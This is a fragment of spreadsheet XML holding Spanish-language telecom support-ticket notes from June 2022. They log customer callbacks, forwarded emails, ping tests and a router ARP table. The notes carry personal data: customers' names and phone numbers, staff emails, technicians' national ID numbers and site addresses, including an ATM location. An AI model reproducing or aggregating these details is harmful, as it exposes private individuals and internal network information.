PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;; MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; BYRON.JUAREZ@CLARO.COM.GT &lt;BYRON.JUAREZ@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 944514 ::: TICKET CNOC IMCRL004784 ::: "SERVICIO FUERA"
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO CON ID 944514OH , LE COMENTO QUE PERSONAL QUE ATIENDE FALLA EN CAMPO, REPORTA OBSERVAR DESCONECTADA LA WAN, SE CONECTÓ INTERFAZ NEGOCIANDO EN HALF, SE PROCEDE A FORZAR PUERTO A 100 FDX, YA EL SERVICIO SE ENCUENTRA OPERATIVO.
&lt;OCOMHNEXN1D1EIM2&gt;PING -C 1000 -S 1500 -M 30 -B -VPN-INSTANCE VPN_CARGILL_0 192.168.239.114
  PING 192.168.239.114: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 192.168.239.114 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/16 MS
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4591868</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
LUN 06/06/2022 2:28 P.M.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PODRÍAN CONFIRMARNOS SI SE TIENE ALGÚN INCONVENIENTE CON LA ENERGÍA O BIEN BRINDARNOS LOS CONTACTOS DEL PUNTO REMOTO PARA REALIZAR PRUEBAS.
TICKET: F4591868
ID: 313900308T
IDENTIFICADOR DEL ENLACE CC_GMG_GT_INTERNET_TIENDA_090
UBICADO EN: INTERNET_8 CALLE 04-37 ZONA 03 BARRIO LA JOYA SAN MARTIN JILOTEPEQUE CHIMALTENANGO¿
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4591884</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID HERNANDEZ AL 24505036 INDICA QUE AUN NO CUENTA CON SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 1001619881
**</t>
  </si>
  <si>
    <t>F4591887</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BORIS ALCOT 31410829 INDICA QUE ESTÁN REALIZANDO PRUEBAS DE LLAMADAS, SOLICITA QUE SE RETOME EL SEGUIMIENTO EL DÍA DE MAÑANA A LAS 11:00 HORAS</t>
  </si>
  <si>
    <t>F4591900</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROBLES AL 58794781 INDICA QUE EL SERVICIO ESTA OK QUE EL PROBLEMA ES INTERNO PERO EL ESTARA VERIFICANDO INTERNAMENTE **
ID 1001634710
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROBLES AL 58794781 SOLICITA QUE SE LE LLAME EN 15 MIN **
ID 1001626077
**</t>
  </si>
  <si>
    <t>F4591902</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, RESPONDE ANTONIA, COMENTA QUE EN SITIO SE ESTA TRABAJANDO POR LO QUE ENERGIA NO ES EL INCONVENIENTE, CONFIRMA LOS SIGUIENTES DATOS:
UBICACION: REDUNDANCIA WIMAX.- AGE.158- SAMAYAC, FRENTE AL PARQUE CENTRAL, SAMAYAC SUCHITEPEQUEZ
CONTACTO EN SITIO: JOSE LETONA 51984123 53008580
HORARAIO 8:30 17:00 HORAS
PERMISOS: IDENTFICADOS  SOLAMENTE
NÚMERO: 53008580
FIN: HOY, 15:18
ID DE LLAMADA: 1001610833</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 17:08
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MIGUEL ANGEL DURAN CHICAS &lt;MIGUEL.DURAN@CLARO.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; MOISES AARON SALAZAR LECHUGA &lt;MOISES.SALAZAR@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: APERTURA FALLA 8901467T
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE                         IBM                  DPI
NERY PEDROZA              6999416         1908740660506
ANDDY SAGASTUME     720005           19603917710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51984123 - 53008580 RESPONDE JOSE MENCIONA QUE SE COORDINE VISITA PARA MAÑANA PERO INDICA QUE AUN NO ESTAN AUTORIZADOS LOS PERMISOS POR LO QUE SE ENVIARA CORREO A LA CENTRAL PARA QUE AUTORICEN EL INGRESO DE PERSONAL TECNICO
-ID 1001639697 - 1001640113</t>
  </si>
  <si>
    <t>F4591910</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR ROMERO 78536075 INFORMA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE, SE PROCEDE AL CIERRE DEL TICKET
1001597846</t>
  </si>
  <si>
    <t>F4591916</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO ASCENCIO AL 22096721  CONTESTA EL SEÑOR JAVIER RIOS QUE AUN NO SE ENCUENTRA AHI EL SEÑOR ERNESTO SOLICITA QUE SE LE LLAME EN 25 MIN NUEVAMENTE **
ID 1001635969
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO ASCENCIO  AL 73085804 / 22096721 EN EL PRIMER NUMERO NO RESPONDE EN EL SEGUNDO INDICAN QUE NO ESTA EN SU LUGAR QU SE LE LLAME EN 10 MIN NUEVAMENTE**
ID 1001631834 - 1001632439
**</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE ERNESTO ASCENCIO 22096721 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001643822</t>
  </si>
  <si>
    <t>F4591918</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 6 DE JUNIO DE 2022 14:55PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM184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1918
ID: 47501321T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1848
UBICADO EN:  ATM 1848 TELGUA TIVOLI 6 CALLE 7-73 ZONA 9
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4591925</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LILIAN MENDEOZA AL 78706942 NO RESPONDE ENVIA A BUZON || SE
INTENTARA LUEGO **
ID 1001614501
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PATRICIA CORTEZ AL 25641777 INDICA QUE NO ESTA EN SITIO PERO QUE SE LE LLAME A LILIAN MENDOZA SE INTENTARA LUEGO **
ID 1001630515
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LILIAN MENDEOZA AL 78706942 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001630147
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PATRICIA CORTEZ AL 25641777 NO RESPONDE | SE INTENTARA LUEGO **
ID 1001614727
**</t>
  </si>
  <si>
    <t>F4591937</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO CUENTAN CON ENERGIA ELECTRICA EN SITIO
1001619438
COLA:
NOMBRE: A: 40713148
NÚMERO: 40713148
DURACIÓN: 0:00:49
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 40713148
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 6/06/2022 15:43:17</t>
  </si>
  <si>
    <t>SE UBICA CONTACTO EN TICKETS ANTERIORES, CONTESTA BERNABE TORRES COMENTA QUE VALIDARA SI SE TRATA TEMA DE ENERGIA SE LLAMARA EN UN MOMENTO. TELEFONO DE CLIENTE 40713148.
RESULTADO: LLAMADA HECHA
NOMBRE: 40713148
NÚMERO: 40713148
INICIO: HOY, 15:04
FIN: HOY, 15:05
DURACIÓN: 1:40
ID DE LLAMADA: 1001607355</t>
  </si>
  <si>
    <t>F4591944</t>
  </si>
  <si>
    <t>CLENTEINETE UBICA EQUIPO OP108 Y PBX APAGADA ##UPS AÑADO ### CLIENTE EBIDO A EMERGIA LO COLOCA EN EL TOMACORRIENTE + INDICA QUE IRA A SU CASA A TRAER UN UPS ## VALIDA CIERRE##SERVICIO UP
ORT STATUS                                	= NORMAL
DEVICE NAME                                	= M03_SSSASVYD_E1_ROMA_03
NAME                                       	= FRAME:0/SLOT:3/PORT:10
ALIAS                                      	= MEMORIAL INTERNATIONAL
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS</t>
  </si>
  <si>
    <t>##  CLIENTE  GABRIELA SICILIANO-79898006  INDICA QUE NO ESTA EN PUNTO REMOTO + QUE SE RETOME MAÑANA 3PM ### VIVO
MSAM 104-2-15
DATOS NO SE TIENE INFORMACION-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIELA SICILIANO-79898006 ##VIVO</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE, INDICA QUE NO PUDO LLEGAR HOY, QUE SE DE SEGUIMIENTO MAÑANA A LAS 2:30 ##
ACTUALMENTE: SERVICIO POSEE AIS + CLIENTE NO SABE SI LOS EQUIPOS ESTAN ENERGIZADOS O INHIBIDOS ##NO HAY NADIE QUIEN PUEDA APOYAR ##  MAÑANA SE REVISARA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIELA SICILIANO-79898006 ##  SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE GABRIELA SICILIANO-79898006 ## VIVO 3#SE TIENE EN LINEA ##</t>
  </si>
  <si>
    <t>F4591948</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS PORTILLO AL 78509882 - 78509703 CONTESTA EL SEÑOR CARLOS RETANA CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001633783 - 1001633993
**</t>
  </si>
  <si>
    <t>F4591957</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS PORTILLO AL 0050378509882 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001638040
**</t>
  </si>
  <si>
    <t>F4591961</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LIC. RETANA QUIEN INDICA QUE NO SE ENCUENTRA EN LAS INSTALACIONES. SOLICITA LLAMADA EN 15MIN.
1001612153
COLA:
NOMBRE: A: 0050378509703
NÚMERO: 0050378509703
DURACIÓN: 0:00:14
ESTADO: CONECTADA
DETALLES: 0050378509703
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 15:19:48</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE CARLOS PORTILLO INDICA QUE NO SE ENCUENTRA EN LAS INSTALACIONES Y SOLICITA SE LLAME A LIC RETANA 78509703
1001609225, 1001609639
COLA:
NOMBRE: A: 0050378509882
NÚMERO: 0050378509882
DURACIÓN: 0:00:34
ESTADO: CONECTADA
DETALLES: 0050378509882
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 15:10:28</t>
  </si>
  <si>
    <t>F4591963</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KIMBERLY ZEPEDA 54387358 MENCIONA QUE EL INCONVENIENTE ES SOLO EN UNA PC POR LO QUE SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
CLIENTE INDICA QUE DARA SEGUIMIENTO CON SU IT
-ID 1001615688</t>
  </si>
  <si>
    <t>F4591981</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD --**
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: MARTES, 7 DE JUNIO DE 2022 01:44
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1613947OH ::: TICKET CNOC IMBBL004135 ::: LINK DOWN
GRACIAS POR LA INFORMACIÓN, PROCEDEMOS AL CIERRE.</t>
  </si>
  <si>
    <t>F4591991</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BERANIA 57929191 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001693539</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BERANIA  AL 57929191 INDICA QUE YA NO ESTA EN SITO QUE SE LE LLAME MAÑANA A PARTIR DE LAS 8:30 AM **
ID 1001641335
**</t>
  </si>
  <si>
    <t>F4592008</t>
  </si>
  <si>
    <t>SE HABLA CON CLINETE  ### CARLOS RIVAS- INDICA QUE EL PROBLEMA  LO UBICARON Y OTRO PROVEEDOR LLEGARA A SOLVENTARLO, PROBLEMA ANIVEL LAN ### COMENTA QUE SE PROCEDA AL CIERRE## A NIVEL DE CLARO TODO OK##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE PATRICIA TOMASINO 25269089- 25269051 MENCIONA QUE EN LAS LLAMADAS SE ESCUCHAN RUIDOS/INTERFERENCIA
-ID 1001645248 - 1001645472</t>
  </si>
  <si>
    <t>## PATRICIA TOMASINO-25269089  SE LLAMA A CLIENTE 3 VECES ##ENVIA A BUZON ### VIVO ## SE INTENTARA NUEVAMENTE EN BREVE</t>
  </si>
  <si>
    <t>F4592021</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 10:42
PARA: SOPORTE@FINCA.GT &lt;SOPORTE@FINCA.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 284500027T | FUNDACION INTERNACIONAL PARA LA ASISTENCIA COMUNITARIA (FINCA GUATEMAL
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  KM 164 MAZATENANGO SUCHITEPEQUEZ C.C. PASEO CARNAVAL PLAZA  FINANCIERA LOCAL 3  Y LOCAL 4
SE ADJUNTAN LOS DATOS DE LOS TÉCNICOS:
PEDROZA MARTINEZ, NERY ALBERTO	699416	1908740660506
SAGATUME AGUILAR, ANNDY FABRISCIO	720005	1960391771001
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JORGE FAJARDO/CLIENTE; SE LE INDICA QUE GESTOR ESTÁ EN LÍNEA CON PR REALIZANDO PRUEBAS CON SERVICIO, AVANCES EN 20/25 MINUTOS.</t>
  </si>
  <si>
    <t>VALIDANDO LO DICHO EN CRONO ANTERIOR, LA CENTRAL PIDE SI ES FACTIBLE QUE SE LLAME A PR A PARTIR DE LAS 07:45AM, CLIENTE DEDUCE PROBLEMAS CON EQUIPOS MIKROTIK/FIREWALL. PROVEEDOR TIGO INDICA QUE DEL LADO DE ELLOS.</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JOSUÉ CORADO/CLIENTE; SE LE INDICA QUE SEGUIMIENTO PARA MAÑANA A LAS 08:00AM A SOLICITUD DE PR.</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JOSUÉ CORADO/CLIENTE; SE LE INDICA QUE SE ESTÁ VERIFICANDO CON PERSONAL TÉCNICO ASIGNADO; ES NECESARIO COLOCAR EQUIPO FORTINET NUEVO. ADICIONAL SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE CON AVANCES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA PRUEBAS PERO NO RESPONDE, ENVIA A BUZON---
47293134</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE SE LLAME A LAS 8 AM EL DIA DE MAÑANA PARA CONTINUAR CON LAS PRUEBAS YA QUE SE RETIRARA DE SITIO--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARSIS SANTOS 47293134 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001646850</t>
  </si>
  <si>
    <t>*- EN BASE A CRONOS ANTERIORES GESTOR-CLIENTE REALIZNADO PRUEBAS, SE CAMBIA ESTADO A WP -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CARSIS PARA SEGUIMIENTO SIN EMBARGO NO RESPONDE
47293134</t>
  </si>
  <si>
    <t>SE HA ESTADO LLAMANDO A CENTRAL IPOLITO GARCIA 51146153 DE CLIENTE YA QUE SE OBSERVA CONEXION ENTRE CENTRAL Y LAN Y EQUIPOS ASOCIADO A LAN, NECESITAMOS VALIDAR CON CENTRAL
1001878295
COLA:
NOMBRE: A: 51146153
NÚMERO: 51146153
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 51146153
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 7/06/2022 18:21:29
1001878466
COLA:
NOMBRE: A: 51146153
NÚMERO: 51146153
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 51146153
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 7/06/2022 18:22:43
FINCA_GUATEMALA#SH IP ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.4.13.1               -   2416.9D58.09F4  ARPA   VLAN1
INTERNET  10.4.13.4               0   C434.6B93.66CC  ARPA   VLAN1
INTERNET  10.4.13.10              0   1868.CB92.5106  ARPA   VLAN1
INTERNET  10.4.13.25              1   C8CB.B809.A9FB  ARPA   VLAN1
INTERNET  10.4.13.90              0   0015.6573.5977  ARPA   VLAN1
INTERNET  10.4.13.91              0   805E.C013.FA5E  ARPA   VLAN1
INTERNET  10.4.113.1              -   2416.9D58.0981  ARPA   GIGABITETHERNET0/0/1
INTERNET  10.4.113.2              0   INCOMPLETE      ARPA
INTERNET  10.72.80.73             1   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.80.76             -   2416.9D58.0980  ARPA   GIGABITETHERNET0/0/0
FINCA_GUATEMALA#</t>
  </si>
  <si>
    <t>CENTRAL FINCA GUATEMALA 50140757 WILMER  QUIEN DE MANERA INTERNA CONFIGURAN SUS EQUIPOS PARA QUE EL TRAFICO DESDE LA CENTRAL NO PASE POR EL FORTINET LUEGO DE ESO CLIENTE REALIZA PRUEBAS CON SUS APLICATIVOS, SERVIDORES Y CONFIRMA QUE TODO FUNCIONA CORRECTAMENTE, CLIENTE WILMER QUEDA ENTERADO QUE POR AHORA ESTA FUCONANDO SERVICIO DE DATOS Y QUE ELLOS DEBEN REGRESAR SUS RUTAS CUANDO SE COLOQUE EL FORTINET DE LADO DE LA SUCURSAL
DE MANERA PROVISIONAL SE DEJA UN CISCO 1111
SEGUIMIENTO PARA CONSEGUIR EL FORTINET CON SUP SUCHITEPEQUEZ/ MAZATE NELSON LOPEZ 58260348
1001882044
COLA:
NOMBRE: A: 50140757
NÚMERO: 50140757
DURACIÓN: 0:43:22
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50140757
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 7/06/2022 19:31:45</t>
  </si>
  <si>
    <t>F4592036</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE LESTER /87704872 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001648937</t>
  </si>
  <si>
    <t>F4592038</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MORALES 24210800 EXT 129 MENCIONA QUE PRESENTRON PROBLEMA DE ENERGIA, CIENTE COLOCA EN CONFERENCIA A PR KEVIN
CLIENTE EN LA LLAMADA APLICA REINICIO A LOS EQUIPOS Y EL SERVICIO RESTABLECE
-ID 1001626621
&lt;HMALGTHCN1T1A04B02EIM2&gt;PING -C 1000 -S 1000 -M 15 -BRIEF -VPN-INSTANCE MAYOREO_COMPUTACION 10.72.193.195
  PING 10.72.193.195: 1000  DATA BYTES, PRESS CTRL_C TO BREAK
    ..............................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.72.193.195 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    936 PACKET(S) RECEIVED
    6.40% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/18 MS
&lt;HMALGTHCN1T1A04B02EIM2&gt;</t>
  </si>
  <si>
    <t>F4592048</t>
  </si>
  <si>
    <t>SE HABLÓ CON SAÚL ORELLANA/CLIENTE 22437253 INDICA ENLACE OK, PIDE SE VALIDE SERVICIO MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR  GERALD TORRES CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET **
-ID 1001909952
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR DIEGO MORA Y SOLICITA QUE SE LE ENVIE CORREO CON LA CAUSA Y LO QUE SE REALIZO || SE NOTIFICA A GESTOR **
ID 1001702535
**</t>
  </si>
  <si>
    <t>F4592058</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE PARA CONTACTOS EN PR || SE DEBE REINICIAR EQUIPOS CON APOYO DE CLIENTE, SE DESCARTAN PROBLEMAS DEL LADO DE CLARO.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO PARA LA AGENCIA CC_CREDOMATIC_GT_INTERNET_AGENCIA_0142, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS.</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2058
ID: 17400421T
IDENTIFICADOR DEL CLIENTE: CC_CREDOMATIC_GT_INTERNET_AGENCIA_0142
UBICADO EN: INTERNET_CALLE PRINCIPAL, LOS AMATES, IZABAL LOS AMATES IZABAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
